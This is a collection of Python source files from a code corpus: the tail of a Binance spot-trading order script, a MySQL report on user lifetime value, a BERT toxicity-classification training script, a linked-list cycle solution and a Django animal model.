client.create_test_order(symbol=symbol, side=side, type=order_type, quantity=quantity) \n \n elif 'LIMIT' in order_type: \n if 'STOP' in order_type: \n \n if side=='BUY': \n stopPrice = float_precision( float(price)*0.9999, tick_size) \n else: \n stopPrice = float_precision( float(price)*1.0001, tick_size) \n \n client.create_test_order(symbol=symbol, side=side, type='STOP_LOSS_LIMIT', timeInForce='GTC',\n stopPrice = stopPrice, price=price, quantity=quantity) \n else: \n client.create_test_order(symbol=symbol, side=side, type='LIMIT', timeInForce='GTC',\n price=price , quantity=quantity)\n \n elif 'PUMP' in order_type:\n client.create_test_order(symbol=symbol, side='BUY', type='MARKET', quantity=quantity)\n \n stop_price = float(price)*0.9999 \n current_price = float(client.get_symbol_ticker(symbol=symbol)['price']) \n target_price = float(price)*1.0001 \n \n while current_price=stop_price: \n current_price = float(client.get_symbol_ticker(symbol=symbol)['price']) \n print('stop', stop_price, 'price', current_price, 'target', target_price, end='\\r') \n print('')\n \n if current_price>=target_price:\n stop_price = target_price \n target_price = target_price*1.25 \n \n client.create_test_order(symbol=symbol, side='SELL', type='MARKET', quantity=quantity)\n \n if current_price>=target_price : \n print('take profit at', current_price,'percentage', round( (current_price/float(price)-1)*100, 2) ) \n else:\n print('stop loss at', current_price, 'percentage', round( (current_price/float(price)-1) *100, 2) ) \n \n else: \n print('live order:', side, order_type, 'symbol', symbol, 'price', price, 'quantity', quantity)\n \n if order_type == 'MARKET': \n order = client.create_order(symbol=symbol, side=side, type=order_type, quantity=quantity)\n \n elif 'LIMIT' in order_type: \n if 'STOP' in order_type: \n \n if side=='BUY': \n stopPrice = float_precision( float(price)*0.95, tick_size) \n else: \n stopPrice = float_precision( float(price)*1.25, tick_size) \n \n client.create_order(symbol=symbol, side=side, type='STOP_LOSS_LIMIT', timeInForce='GTC',\n stopPrice = stopPrice, price=price, quantity=quantity) \n else:\n client.create_order(symbol=symbol, side=side, type='LIMIT', timeInForce='GTC',\n price=price , quantity=quantity) \n \n elif 'PUMP' in order_type:\n client.create_order(symbol=symbol, side='BUY', type='MARKET', quantity=quantity) \n \n stop_price = float(price)*0.95 \n current_price = float(client.get_symbol_ticker(symbol=symbol)['price']) \n target_price = float(price)*1.25 \n \n while current_price=stop_price: \n current_price = float(client.get_symbol_ticker(symbol=symbol)['price']) \n print('stop', stop_price, 'price', current_price, 'target', target_price, end='\\r') \n print('')\n \n if current_price>=target_price: \n stop_price = target_price \n target_price = target_price*1.05 \n \n client.create_order(symbol=symbol, side='SELL', type='MARKET', quantity=quantity) \n \n if current_price>=target_price : \n print('take profit at', current_price,'percentage', round( (current_price/float(price)-1)*100, 2) ) \n else:\n print('stop loss at', current_price, 'percentage', round( (current_price/float(price)-1) *100, 2) ) \n \n except BinanceAPIException as error:\n print(error) \n \n except BinanceOrderException as error:\n print(error) \n \nif __name__ == '__main__':\n make_order() \n \n","sub_path":"spot/spot.py","file_name":"spot.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"30522330","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : NewUserLtvByDate.py\n# @Author: MoonKuma\n# @Date : 2018/10/10\n# @Desc : Daily user increase, and their ltv\n\nimport util.EasyXls as EasyXls\nimport util.EasyMysql as EasyMysql\nimport conf.ConfParameters as ConfParameters\nimport MySQLdb\nimport xlwt\n\n\nclass NewUserLtvByDate(object):\n\n def __init__(self, start_date, end_date, *channel):\n # conf path\n self.conf_path = ConfParameters.ConfParameters().conf_path\n # initial mysql-db\n self.mysql_para = ConfParameters.ConfParameters().mysql_conf\n self.stat_base = self.mysql_para['stat_base']\n self.db = None # such is initiate not in constructor but when actually used to ensure db get closed after connect\n self.cursor = None\n self.easy_sql = EasyMysql.EasyMysql()\n # initial xls writer\n self.wbk = xlwt.Workbook()\n self.xls_writer = EasyXls.EasyXls()\n self.style = xlwt.XFStyle()\n self.style.borders = self.xls_writer.borders\n # local parameter\n self.start_date = start_date\n self.end_date = end_date\n self.channel = ['-1']\n self.zone = ['-1']\n self.period_limit = '30'\n if len(channel) > 0:\n self.channel = list(channel[0])\n # self.date_list = DateList.DateList().get_date_list(self.start_date, self.end_date)\n\n def __select_sql_data(self, table_name, *query_type): # such functions are no longer exposed to outsides\n # table_name : user_reten_pay, user_reten_pay_openid\n # return : [reg_date_list,check_date_list,{reg_date|check_date:money}, {reg_date: reg_users}]\n reg_date_list = list()\n check_date_list = list()\n data_dict = dict()\n reg_user_dict = dict()\n #\n where_clause = ' where period<=' + str(self.period_limit) + ' and date between \\'' + self.start_date + '\\' and \\'' + self.end_date + '\\''\n if self.channel[0] != '-1':\n channel_str = self.easy_sql.sql_value_str(self.channel)\n where_clause += ' and channel in (' + channel_str + ') '\n if self.zone[0] != '-1':\n zone_str = self.easy_sql.sql_value_str(self.zone)\n where_clause += ' and zoneid in (' + zone_str + ') '\n sql_str = 'select concat(date),period,concat(date_add(date, interval period day)),sum(count),ceil(sum(money/100)) from ' + table_name + where_clause + ' group by date,period;'\n print(sql_str)\n self.cursor.execute(sql_str)\n all_data = self.cursor.fetchall()\n if all_data:\n for rec in all_data:\n reg_date = rec[0]\n check_date = str(rec[1])\n date_mark = rec[2]\n user_count = rec[3]\n money = rec[4]\n if reg_date not in reg_date_list:\n reg_date_list.append(reg_date)\n if check_date not in check_date_list:\n check_date_list.append(check_date)\n key = reg_date + '|' + check_date\n if key not in data_dict.keys():\n if len(query_type) == 0 or query_type[0] == 'ltv':\n data_dict[key] = int(money)\n elif query_type[0] == 'reten':\n data_dict[key] = int(user_count)\n if reg_date == date_mark:\n reg_user_dict[reg_date] = int(user_count)\n reg_date_list = sorted(reg_date_list)\n check_date_list = sorted(check_date_list, key=lambda x: int(x))\n log = 'Sql query finished, with len(reg_date_list): ' + str(len(reg_date_list)) + ', len(check_date_list):' + str(len(check_date_list)) + ', len(data_dict.keys()):' + str(len(data_dict.keys())) + ', len(reg_user_dict.keys()):' + str(len(reg_user_dict.keys()))\n print(log)\n return [reg_date_list, check_date_list, data_dict, reg_user_dict]\n\n def __write_ltv_sheet(self, table_name, sheet_name, *query_type):\n # sql data\n [reg_date_list, check_date_list, data_dict, reg_user_dict] = self.__select_sql_data(table_name, *query_type)\n # write sheet\n sheet = self.xls_writer.new_sheet(sheet_name, self.wbk)\n line_num = [0]\n sheet.col(0).width = 256 * 20\n # title\n name_list = [sheet_name]\n self.xls_writer.insert_xls_style(name_list, sheet, line_num, self.style)\n line_num[0] = line_num[0] + 2\n # head\n head_line = ['注册日期', '注册人数']\n for date in check_date_list:\n date_str = '第' + str(int(date)+1) + '日'\n head_line.append(date_str)\n self.xls_writer.insert_xls_style(head_line, sheet, line_num, self.style)\n # content\n for reg_date in reg_date_list:\n data_line = list()\n data_line.append(reg_date)\n reg_user = reg_user_dict.setdefault(reg_date, 0)\n data_line.append(reg_user)\n if reg_user == 0:\n reg_user = 1\n for check_date in check_date_list:\n key = reg_date + '|' + check_date\n if key not in data_dict.keys():\n data_line.append('')\n continue\n ltv = round(data_dict.setdefault(key, 0)/float(reg_user), 2)\n data_line.append(ltv)\n self.xls_writer.insert_xls_style(data_line, sheet, line_num, self.style)\n\n def execute(self, file_name):\n # file_name = ConfParameters.ConfParameters().save_path + 'User_diamond_' + self.start_date + '-' + self.end_date + '.xls'\n self.db = MySQLdb.connect(self.mysql_para['ip'], self.mysql_para['users'], self.mysql_para['password'],\n self.mysql_para['stat_base'])\n self.cursor = self.db.cursor()\n try:\n self.zone = [10001]\n self.channel = [1045]\n self.__write_ltv_sheet('user_reten_pay', '1服UID新增按日留存', 'reten')\n self.wbk.save(file_name)\n finally:\n self.db.close()\n\n\n# Main\nif __name__ == '__main__':\n start = '2018-03-28'\n end = '2018-05-18'\n\n channel_name = 'IOS'\n save_name = ConfParameters.ConfParameters().save_path + 'NewUserLtvRetenByDate_' + start + '_' + end + '_' + channel_name + '.xls'\n # NewUserLtvByDate(start, end, channel_id).execute(save_name)\n NewUserLtvByDate(start, end).execute(save_name)\n","sub_path":"NewUserLtvByDate.py","file_name":"NewUserLtvByDate.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"137646532","text":"import argparse\nimport json\nimport shutil\nfrom collections import OrderedDict\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Dict\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport tqdm\nfrom apex import amp\nfrom pytorch_pretrained_bert import BertAdam, BertTokenizer\nfrom pytorch_pretrained_bert import BertForSequenceClassification\nfrom sklearn.metrics import roc_auc_score\nfrom torch import nn\nfrom torch.nn.utils.rnn import pad_sequence\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom utils import (\n BucketBatchSampler,\n get_learning_rate, set_seed,\n write_event, load_model)\n\n# loss1\ndef custom_loss(pred, targets, loss_weight):\n bce_loss_1 = nn.BCEWithLogitsLoss(weight=targets[:, 1:2])(pred[:, :1], targets[:, :1])\n bce_loss_2 = nn.BCEWithLogitsLoss()(pred[:, 1:], targets[:, 2:])\n return (bce_loss_1 * loss_weight) + bce_loss_2\n\n# loss2\ndef custom_loss2(pred, targets, loss_weight):\n p_mean = 0.6568\n n_mean = 0.0549\n p_squ = 0.45082\n n_squ = 0.01456\n\n pred_ = pred[:, :1]\n P = targets[:, :1] != 0\n N = targets[:, :1] == 0\n\n x_p, x_n = pred_[P], pred_[N]\n if not x_p.size()[0]:\n mean_p = p_mean\n squ_p = p_squ\n else:\n mean_p = x_p.mean()\n squ_p = (x_p * x_p).mean()\n\n if not x_n.size():\n mean_n = n_mean\n squ_n = n_squ\n else:\n mean_n = x_n.mean()\n squ_n = (x_n * x_n).mean()\n\n bce_loss_1 = nn.BCEWithLogitsLoss(weight=targets[:, 1:2])(pred[:, :1], targets[:, :1])\n bce_loss_2 = nn.BCEWithLogitsLoss()(pred[:, 1:], targets[:, 2:])\n # extra_loss_1 = torch.log(torch.exp(mean_n - mean_p) + 1)\n extra_loss_1 = mean_n - mean_p + 1\n\n return (bce_loss_1 * loss_weight) + bce_loss_2 + extra_loss_1 * 0.1\n\n\ndef convert_one_line(text, max_seq_length=None, tokenizer=None, split_point=0.25):\n max_seq_length -= 2\n tokens_a = tokenizer.tokenize(text)\n int_split = int(split_point * max_seq_length)\n if len(tokens_a) > max_seq_length:\n tokens_a = tokens_a[:int_split] + tokens_a[int_split - max_seq_length:]\n one_token = tokenizer.convert_tokens_to_ids(\n [\"[CLS]\"] + tokens_a + [\"[SEP]\"]) # +[0] * (max_seq_length - len(tokens_a))\n return one_token\n\n\nclass TrainDataset(Dataset):\n\n def __init__(self, text, lens, target, identity_df, weights, model=\"mybert\", split_point=0.25, do_lower_case=True):\n super(TrainDataset, self).__init__()\n\n self._text = text\n self._lens = lens\n self._target = target\n self._identity_df = identity_df\n self._weights = weights\n self._split_point = split_point\n VOCAB_PATH = Path('../input/torch-bert-weights/%s/vocab.txt' % (model))\n\n self._tokenizer = BertTokenizer.from_pretrained(\n VOCAB_PATH, cache_dir=None, do_lower_case=do_lower_case)\n\n def __len__(self):\n return len(self._text)\n\n def __getitem__(self, idx):\n text = self._text[idx]\n lens = self._lens[idx]\n target = self._target[idx]\n # identity_df = self._identity_df.iloc[[idx], :]\n weight = self._weights[idx]\n return torch.LongTensor(convert_one_line(text, max_seq_length=220, tokenizer=self._tokenizer,\n split_point=self._split_point)), lens, target, weight\n\n\ndef collate_fn(batch):\n text, lens, targets, weights = zip(*batch)\n # identity_df = pd.concat(list(identitys)).reset_index(drop=True)\n text = pad_sequence(text, batch_first=True)\n lens = torch.LongTensor(lens)\n weights = torch.FloatTensor(weights)\n targets = torch.FloatTensor(targets)\n return text, lens, targets, weights\n\n\nclass BertModel(nn.Module):\n\n def __init__(self, pretrain_path, dropout=0.1):\n super(BertModel, self).__init__()\n self.bert = BertForSequenceClassification.from_pretrained(pretrain_path, cache_dir=None, num_labels=1)\n self.aux_head = nn.Sequential(\n OrderedDict([\n ('dropout', nn.Dropout(dropout)),\n ('clf', nn.Linear(self.bert.config.hidden_size, 6)),\n ])\n )\n self.main_head = nn.Sequential(\n OrderedDict([\n ('dropout', nn.Dropout(dropout)),\n ('clf', nn.Linear(self.bert.config.hidden_size, 1))\n ])\n )\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None):\n _, pooled_output = self.bert.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False)\n aux_logits = self.aux_head(pooled_output)\n main_logits = self.main_head(pooled_output)\n out = torch.cat([main_logits, aux_logits], 1)\n return out\n\n\nclass JigsawEvaluator:\n\n def __init__(self, y_true, y_identity, power=-5, overall_model_weight=0.25, identity_columns=None):\n self.y = (y_true >= 0.5).astype(int)\n self.y_i = (y_identity >= 0.5).astype(int)\n self.n_subgroups = self.y_i.shape[1]\n self.power = power\n self.overall_model_weight = overall_model_weight\n self.identity_columns = identity_columns\n\n @staticmethod\n def _compute_auc(y_true, y_pred):\n try:\n return roc_auc_score(y_true, y_pred)\n except ValueError:\n return np.nan\n\n def _compute_subgroup_auc(self, i, y_pred):\n mask = self.y_i[:, i] == 1\n return self._compute_auc(self.y[mask], y_pred[mask])\n\n def _compute_bpsn_auc(self, i, y_pred):\n mask = self.y_i[:, i] + self.y == 1\n return self._compute_auc(self.y[mask], y_pred[mask])\n\n def _compute_bnsp_auc(self, i, y_pred):\n mask = self.y_i[:, i] + self.y != 1\n return self._compute_auc(self.y[mask], y_pred[mask])\n\n def compute_bias_metrics_for_model(self, y_pred):\n records = []\n # records = np.zeros((3, self.n_subgroups))\n for i in range(self.n_subgroups):\n record = dict()\n record['subgroup_auc'] = self._compute_subgroup_auc(i, y_pred)\n record['bpsn_auc'] = self._compute_bpsn_auc(i, y_pred)\n record['bnsp_auc'] = self._compute_bnsp_auc(i, y_pred)\n # records[0, i] = self._compute_subgroup_auc(i, y_pred)\n # records[1, i] = self._compute_bpsn_auc(i, y_pred)\n # records[2, i] = self._compute_bnsp_auc(i, y_pred)\n records.append(record)\n return pd.DataFrame(records, index=self.identity_columns)\n\n def _calculate_overall_auc(self, y_pred):\n return roc_auc_score(self.y, y_pred)\n\n def _power_mean(self, array):\n total = sum(np.power(array, self.power))\n return np.power(total / len(array), 1 / self.power)\n\n def get_final_metric(self, y_pred):\n bias_metrics = self.compute_bias_metrics_for_model(y_pred)\n bias_score = np.average([\n # self._power_mean(bias_metrics[0]),\n # self._power_mean(bias_metrics[1]),\n # self._power_mean(bias_metrics[2])\n self._power_mean(bias_metrics['subgroup_auc']),\n self._power_mean(bias_metrics['bpsn_auc']),\n self._power_mean(bias_metrics['bnsp_auc'])\n ])\n overall_score = self.overall_model_weight * self._calculate_overall_auc(y_pred)\n bias_score = (1 - self.overall_model_weight) * bias_score\n return overall_score + bias_score, bias_metrics\n\n\ndef main():\n parser = argparse.ArgumentParser()\n arg = parser.add_argument\n arg('mode', choices=['train', 'validate', 'predict', 'train_all'])\n arg('run_root')\n arg('--model', default='mybert')\n arg('--pretrained', type=int, default=0)\n arg('--batch-size', type=int, default=32)\n arg('--step', type=int, default=1)\n arg('--workers', type=int, default=2)\n arg('--lr', type=float, default=0.0002)\n arg('--patience', type=int, default=4)\n arg('--clean', action='store_true')\n arg('--n-epochs', type=int, default=1)\n arg('--kloss', type=float, default=1.0)\n arg('--loss_fn', default='loss1')\n arg('--fold_name', default='/folds_binary_weights_kernal.pkl')\n arg('--limit', type=int)\n arg('--fold', type=int, default=0)\n arg('--multi-gpu', type=int, default=0)\n arg('--lr_layerdecay', type=float, default=0.95)\n arg('--warmup', type=float, default=0.05)\n arg('--split_point', type=float, default=0.3)\n arg('--bsample', type=bool, default=False)\n arg('--do_lower_case', type=bool, default=True)\n args = parser.parse_args()\n\n set_seed()\n BERT_PRETRAIN_PATH = '../input/torch-bert-weights/%s/' % (args.model)\n run_root = Path('../experiments/' + args.run_root)\n DATA_ROOT = Path('../input/jigsaw-unintended-bias-in-toxicity-classification')\n\n folds = pd.read_pickle(str(DATA_ROOT) + args.fold_name)\n print(folds['weights'].mean())\n\n identity_columns = ['male', 'female', 'homosexual_gay_or_lesbian', 'christian', 'jewish',\n 'muslim', 'black', 'white', 'psychiatric_or_mental_illness']\n\n if args.mode == \"train_all\":\n train_fold = folds\n else:\n train_fold = folds[folds['fold'] != args.fold]\n valid_fold = folds[folds['fold'] == args.fold]\n valid_fold = valid_fold.sort_values(by=[\"len\"])\n\n if args.limit:\n train_fold = train_fold[:args.limit]\n if args.mode != \"train_all\":\n valid_fold = valid_fold[:args.limit * 3]\n\n if args.mode == \"train_all\":\n valid_df = None\n else:\n valid_df = valid_fold[identity_columns + [\"target\"]]\n\n loss_weight = 1 / folds['weights'].mean() * args.kloss\n\n if args.loss_fn == \"loss1\":\n loss_fn = custom_loss\n elif args.loss_fn == \"loss2\":\n loss_fn = custom_loss2\n\n criterion = partial(loss_fn, loss_weight=loss_weight)\n\n if args.mode == 'train' or args.mode == \"train_all\":\n if run_root.exists() and args.clean:\n shutil.rmtree(run_root)\n run_root.mkdir(exist_ok=True, parents=True)\n (run_root / 'params.json').write_text(\n json.dumps(vars(args), indent=4, sort_keys=True))\n\n training_set = TrainDataset(train_fold['comment_text'].tolist(), lens=train_fold['len'].tolist(),\n target=train_fold[['binary_target', 'weights', 'target', 'severe_toxicity',\n 'obscene', 'identity_attack', 'insult',\n 'threat']].values.tolist(),\n identity_df=train_fold[identity_columns], weights=train_fold['weights'].tolist(),\n model=args.model, split_point=args.split_point, do_lower_case=args.do_lower_case)\n if args.bsample:\n bbsampler = BucketBatchSampler(training_set, batch_size=args.batch_size, drop_last=True,\n sort_key=lambda x: x[1], biggest_batches_first=None,\n bucket_size_multiplier=100, shuffle=True)\n batchsize = 1\n shuffle = False\n\n else:\n bbsampler = None\n batchsize = args.batch_size\n shuffle = True\n\n training_loader = DataLoader(training_set, batch_sampler=bbsampler, collate_fn=collate_fn,\n num_workers=args.workers, batch_size=batchsize, shuffle=shuffle)\n\n if args.mode == \"train\":\n valid_set = TrainDataset(valid_fold['comment_text'].tolist(), lens=valid_fold['len'].tolist(),\n target=valid_fold['binary_target'].values.tolist()\n , identity_df=valid_fold[identity_columns], weights=valid_fold['weights'].tolist(),\n model=args.model, split_point=args.split_point, do_lower_case=args.do_lower_case)\n valid_loader = DataLoader(valid_set, batch_size=args.batch_size, shuffle=False, collate_fn=collate_fn,\n num_workers=args.workers)\n else:\n valid_loader = None\n\n model = BertModel(BERT_PRETRAIN_PATH)\n model.cuda()\n\n if args.model in [\"bert-base-uncased\", \"bert-base-cased\", \"mybert\", \"gpt2\", 'mybert-base-cased',\n 'mybert-base-uncased']:\n NUM_LAYERS = 12\n elif args.model in [\"bert-large-uncased\", \"bert-large-cased\", \"mybertlarge\", \"wmm\", \"mybertlargecased\",\n \"wwmcased\", \"mybert-large-uncased\", 'mybert-wwm-uncased']:\n NUM_LAYERS = 24\n else:\n raise ValueError(args.model+' is a invalid model name')\n\n optimizer_grouped_parameters = [\n {'params': model.bert.bert.embeddings.parameters(), 'lr': args.lr * (args.lr_layerdecay ** NUM_LAYERS)},\n {'params': model.main_head.parameters(), 'lr': args.lr},\n {'params': model.aux_head.parameters(), 'lr': args.lr},\n {'params': model.bert.bert.pooler.parameters(), 'lr': args.lr}\n ]\n\n for layer in range(NUM_LAYERS):\n optimizer_grouped_parameters.append(\n {'params': model.bert.bert.encoder.layer.__getattr__('%d' % (NUM_LAYERS - 1 - layer)).parameters(),\n 'lr': args.lr * (args.lr_layerdecay ** layer)},\n )\n optimizer = BertAdam(optimizer_grouped_parameters, lr=args.lr, warmup=args.warmup,\n t_total=len(training_loader) // args.step)\n\n scheduler = ReduceLROnPlateau(optimizer, patience=0, factor=0.1, verbose=True, mode='max', min_lr=1e-7)\n\n model, optimizer = amp.initialize(model, optimizer, opt_level=\"O2\", verbosity=0)\n\n optimizer.zero_grad()\n\n if args.multi_gpu == 1:\n model = nn.DataParallel(model)\n\n train(args, model, optimizer, scheduler, criterion,\n train_loader=training_loader,\n valid_df=valid_df, valid_loader=valid_loader, epoch_length=len(training_set))\n\n elif args.mode == 'validate':\n\n valid_set = TrainDataset(valid_fold['comment_text'].tolist(), lens=valid_fold['len'].tolist(),\n target=valid_fold[['binary_target']].values.tolist(),\n identity_df=valid_fold[identity_columns],\n weights=valid_fold['weights'].tolist(), model=args.model, split_point=args.split_point,\n do_lower_case=args.do_lower_cased)\n valid_loader = DataLoader(valid_set, batch_size=args.batch_size, shuffle=False, collate_fn=collate_fn,\n num_workers=args.workers)\n model = BertModel(BERT_PRETRAIN_PATH)\n load_model(model, run_root / ('best-model-%d.pt' % args.fold), multi2single=False)\n model.cuda()\n\n optimizer = BertAdam(model.parameters(), lr=1e-5, warmup=0.95)\n\n model, optimizer = amp.initialize(model, optimizer, opt_level=\"O2\", verbosity=0)\n\n if args.multi_gpu == 1:\n model = nn.DataParallel(model)\n\n validation(model, criterion, valid_df, valid_loader, args, save_result=True, progress=True)\n\n\ndef train(args, model: nn.Module, optimizer, scheduler, criterion, *,\n train_loader, valid_df, valid_loader, epoch_length, patience=1,\n n_epochs=None) -> bool:\n n_epochs = n_epochs or args.n_epochs\n\n run_root = Path('../experiments/' + args.run_root)\n model_path = run_root / ('model-%d.pt' % args.fold)\n best_model_path = run_root / ('best-model-%d.pt' % args.fold)\n if best_model_path.exists():\n state, best_valid_score = load_model(model, best_model_path)\n start_epoch = state['epoch']\n best_epoch = start_epoch\n else:\n best_valid_score = 0\n start_epoch = 0\n best_epoch = 0\n step = 0\n\n if args.mode == \"train_all\":\n current_score = 0.95\n\n save = lambda ep: torch.save({\n 'model': model.module.state_dict() if args.multi_gpu == 1 else model.state_dict(),\n 'epoch': ep,\n 'step': step,\n 'best_valid_loss': current_score\n }, str(model_path))\n #\n report_each = 10000\n log = run_root.joinpath('train-%d.log' % args.fold).open('at', encoding='utf8')\n\n for epoch in range(start_epoch, start_epoch + n_epochs):\n model.train()\n\n lr = get_learning_rate(optimizer)\n tq = tqdm.tqdm(total=epoch_length)\n tq.set_description(f'Epoch {epoch}, lr {lr}')\n losses = []\n\n mean_loss = 0\n for i, (inputs, _, targets, weights) in enumerate(train_loader):\n attention_mask = (inputs > 0).cuda()\n inputs, targets, weights = inputs.cuda(), targets.cuda(), weights.unsqueeze(1).cuda()\n\n outputs = model(inputs, attention_mask=attention_mask, labels=None)\n\n loss = criterion(outputs, targets) / args.step\n batch_size = inputs.size(0)\n if (i + 1) % args.step == 0:\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n else:\n with amp.scale_loss(loss, optimizer, delay_unscale=True) as scaled_loss:\n scaled_loss.backward()\n\n tq.update(batch_size)\n losses.append(loss.item() * args.step)\n mean_loss = np.mean(losses[-report_each:])\n tq.set_postfix(loss=f'{mean_loss:.5f}')\n if i and i % report_each == 0:\n write_event(log, step, loss=mean_loss)\n\n write_event(log, step, epoch=epoch, loss=mean_loss)\n tq.close()\n\n if args.mode == \"train\":\n valid_metrics = validation(model, criterion, valid_df, valid_loader, args)\n write_event(log, step, **valid_metrics)\n current_score = valid_metrics['score']\n save(epoch + 1)\n if scheduler is not None and args.mode == \"train\":\n scheduler.step(current_score)\n\n if args.mode == \"train\":\n if current_score > best_valid_score:\n best_valid_score = current_score\n shutil.copy(str(model_path), str(best_model_path))\n best_epoch = epoch\n else:\n pass\n return True\n\n\ndef validation(model: nn.Module, criterion, valid_df, valid_loader, args, save_result=True, progress=True) -> Dict[\n str, float]:\n run_root = Path('../experiments/' + args.run_root)\n model.eval()\n all_losses, all_predictions, all_targets = [], [], []\n if progress:\n tq = tqdm.tqdm(total=len(valid_df))\n with torch.no_grad():\n for inputs, _, targets, weights in valid_loader:\n if progress:\n batch_size = inputs.size(0)\n tq.update(batch_size)\n all_targets.append(targets.numpy().copy())\n attention_mask = (inputs > 0).cuda()\n inputs, targets = inputs.cuda(), targets.cuda()\n outputs = model(inputs, attention_mask=attention_mask, labels=None)\n outputs = outputs[:, 0].view(-1, 1)\n loss = nn.BCEWithLogitsLoss()(outputs, targets.view(-1, 1)) # *N_CLASSES\n all_losses.append(loss.item()) # _reduce_loss\n predictions = torch.sigmoid(outputs)\n all_predictions.append(predictions.cpu().numpy())\n\n all_predictions = np.concatenate(all_predictions)\n all_targets = np.concatenate(all_targets)\n\n if save_result:\n np.save(run_root / 'prediction_fold{}.npy'.format(args.fold), all_predictions)\n np.save(run_root / 'target_fold{}.npy'.format(args.fold), all_targets)\n\n identity_columns = [\n 'male', 'female', 'homosexual_gay_or_lesbian', 'christian', 'jewish',\n 'muslim', 'black', 'white', 'psychiatric_or_mental_illness']\n y_true = valid_df['target'].values\n y_identity = valid_df[identity_columns].values\n\n evaluator = JigsawEvaluator(y_true, y_identity, identity_columns=identity_columns)\n\n score, bias_metrics = evaluator.get_final_metric(all_predictions)\n if progress:\n tq.close()\n\n metrics = dict()\n metrics['loss'] = np.mean(all_losses)\n metrics['score'] = score\n to_print = []\n for idx, (k, v) in enumerate(sorted(metrics.items(), key=lambda kv: -kv[1])):\n to_print.append(f'{k} {v:.5f}')\n print(' | '.join(to_print))\n metrics[\"bias\"] = bias_metrics.to_json()\n return metrics\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bert/main_bert.py","file_name":"main_bert.py","file_ext":"py","file_size_in_byte":20467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"326397965","text":"'''\nhttp://fisherlei.blogspot.com/2013/11/leetcode-linked-list-cycle-ii-solution.html\n\n还是采用一个走一步,一个走两步的办法\n\n1 -> 2 -> ... -> x-1 -> x -> x+1 -> ... -> x+k -> ... -> x+y -| \n ^ |\n |-------------------------------|\n \n假设在 x+k 相遇\nt = x + n*y + k\n2t = x + m*y + k\n\n2x + 2ny + 2k = x + my + k\nx + k = (m - 2n) * y\n\n等于说,两个指针相遇以后,再往下走 x 步就回到Cycle的起点了\n'''\n\nclass Solution:\n \"\"\"\n @param: head: The first node of linked list.\n @return: The node where the cycle begins. if there is no cycle, return null\n \"\"\"\n def detectCycle(self, head):\n # write your code here\n if head is None:\n return None\n node1 = head\n node2 = head\n while node2.next and node2.next.next:\n node1 = node1.next\n node2 = node2.next.next\n if node1 is node2:\n break\n if node2.next is None or node2.next.next is None:\n return None\n # go x step\n node1 = head\n while node1 is not node2:\n node1 = node1.next\n node2 = node2.next\n return node1","sub_path":"Lintcode-ladder/LinkedList/linkedListCycleII.py","file_name":"linkedListCycleII.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"166325112","text":"from django.utils.translation import ugettext_lazy as _\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\nfrom base.models import BaseModel\nfrom kennels.models import Kennel\n\n\nclass BaseAnimal(BaseModel):\n GENDER_MALE = 'male'\n GENDER_FEMALE = 'female'\n\n GENDER_CHOICES = (\n (GENDER_MALE, 'male'),\n (GENDER_FEMALE, 'female'),\n )\n\n # ANIMAL_CHOICES = (\n # ('dogs', 'dogs'),\n # ('cats', 'cats'),\n # )\n\n type = models.CharField(max_length=100, choices=Kennel.TYPE_CHOICES, null=True, blank=True)\n full_name = models.CharField(max_length=256, blank=True, null=True)\n home_name = models.CharField(max_length=100, blank=True, null=True)\n birthday = models.DateField(blank=True, null=True)\n deathday = models.DateField(blank=True, null=True)\n kennel_of_birth = models.ForeignKey('kennels.Kennel', null=True, blank=True, related_name='kennel_birth',\n on_delete=models.SET_NULL)\n kennel_live = models.ForeignKey('kennels.Kennel', null=True, blank=True, related_name='kennel_live',\n on_delete=models.SET_NULL)\n owner = models.ForeignKey(User, blank=True, null=True,\n on_delete=models.CASCADE)\n mother = models.ForeignKey('self', null=True, blank=True, related_name='mother_dog',\n on_delete=models.SET_NULL)\n father = models.ForeignKey('self', null=True, blank=True, related_name='father_dog',\n on_delete=models.SET_NULL)\n breed = models.ForeignKey('breeds.Breed', null=True, blank=True,\n on_delete=models.SET_NULL)\n color = models.CharField(max_length=50, null=True, blank=True)\n height = models.CharField(max_length=50, blank=True, null=True)\n registry = models.CharField(max_length=50, null=True, blank=True)\n pedigree = models.URLField(null=True, blank=True)\n\n entitlements = models.CharField(max_length=2048, null=True, blank=True)\n\n gender = models.CharField(max_length=100, choices=GENDER_CHOICES, null=True, blank=True)\n\n achievements = models.CharField(max_length=2048, null=True, blank=True)\n\n elbow_ed = models.CharField(max_length=2048, null=True, blank=True)\n hip_hd = models.CharField(max_length=2048, null=True, blank=True)\n tattoo = models.CharField(max_length=50, null=True, blank=True)\n\n dna_data = models.CharField(max_length=2048, null=True, blank=True)\n\n microchip = models.CharField(max_length=50, null=True, blank=True)\n\n photo = models.ImageField(upload_to='images/%Y/%m/%d', blank=True, null=True)\n\n about = models.CharField(max_length=10000, blank=True, null=True)\n slug = models.CharField(max_length=256, blank=True, null=True)\n is_owner = models.BooleanField(default=False)\n\n class Meta:\n db_table = 'kennel_animal'\n verbose_name = _('Animal')\n verbose_name_plural = _('Animals')\n\n def humanize_type(self):\n return dict(Kennel.TYPE_CHOICES).get(self.type)\n\n def humanize_gender(self):\n return dict(self.GENDER_CHOICES).get(self.gender)\n\n def __str__(self):\n return u'%s' % (self.full_name)","sub_path":"animals/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 